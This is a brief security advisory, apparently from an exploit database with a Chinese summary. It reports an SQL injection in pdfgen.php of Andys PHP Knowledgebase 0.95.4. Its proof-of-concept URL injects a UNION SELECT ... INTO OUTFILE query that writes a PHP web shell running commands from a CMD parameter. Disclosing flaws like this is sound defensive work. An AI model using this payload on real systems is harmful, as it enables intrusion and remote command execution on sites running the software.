Andys PHP Knowledgebase是一款知识管理系统。Andys PHP Knowledgebase 0.95.4中的pdfgen.php文件存在SQL注入漏洞,可能导致敏感信息泄露。

[+]info:
~~~~~~~~~

Software................Andys PHP Knowledgebase Project 0.95.4
Vulnerability...........SQL Injection
Threat Level............Critical (4/5)
Download................
Discovery Date..........3/27/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................
Email...................John Leitch <john@autosectools.com>
 
[+]poc:
~~~~~~~~~

A SQL injection vulnerability can be used to extract arbitrary data.
In some environments it may be possible to create a PHP shell.
--PoC--
localhost/aphpkb/plugins/pdfClasses/pdfgen.php?pdfa=and%201=0%20UNION%20SELECT%20<?php%20system($_GET["CMD"]);%20?>,%20FROM%20dual%20INTO%20OUTFILE%20../../htdocs/shell.php;%23
  
修复:过滤pdfgen.php